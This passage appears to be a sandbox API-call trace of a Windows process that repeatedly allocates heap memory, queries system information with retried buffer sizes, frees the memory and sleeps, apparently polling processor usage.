SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0284.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0284.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0284.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.689] Sleep (dwMilliseconds=0x110) [0284.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0284.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0284.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0284.710] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0284.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0284.710] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.711] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0284.711] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0284.711] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.711] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0284.711] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.712] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.712] Sleep (dwMilliseconds=0x110) [0284.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0284.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.716] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0284.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0284.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0284.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0284.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0284.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0284.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0284.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.719] Sleep (dwMilliseconds=0x110) [0284.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0284.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0284.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0284.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0284.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0284.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0284.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0284.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0284.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.734] Sleep (dwMilliseconds=0x110) [0284.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0284.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0284.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0284.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0284.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0284.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0284.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0284.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0284.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.750] Sleep (dwMilliseconds=0x110) [0284.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0284.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.763] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0284.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0284.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0284.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0284.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0284.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0284.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0284.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.765] Sleep (dwMilliseconds=0x110) [0284.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0284.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0284.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0284.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0284.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0284.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0284.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0284.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0284.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.781] Sleep (dwMilliseconds=0x110) [0284.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0284.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.794] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0284.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0284.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0284.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0284.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0284.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0284.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0284.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.796] Sleep (dwMilliseconds=0x110) [0284.809] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0284.809] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0284.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0284.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0284.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0284.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0284.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0284.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0284.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.812] Sleep (dwMilliseconds=0x110) [0284.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0284.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0284.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0284.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0284.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0284.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0284.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0284.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0284.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.829] Sleep (dwMilliseconds=0x110) [0284.855] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0284.855] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.856] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0284.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0284.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.856] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0284.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0284.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0284.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0284.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0284.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.858] Sleep (dwMilliseconds=0x110) [0284.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0284.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0284.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0284.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0284.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0284.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0284.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0284.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0284.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.874] Sleep (dwMilliseconds=0x110) [0284.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0284.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0284.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0284.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0284.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0284.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0284.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0284.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0284.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.891] Sleep (dwMilliseconds=0x110) [0284.903] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0284.903] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0284.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0284.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0284.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0284.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0284.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0284.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0284.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.905] Sleep (dwMilliseconds=0x110) [0284.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0284.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.919] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0284.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0284.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0284.920] RtlAllocateHeap 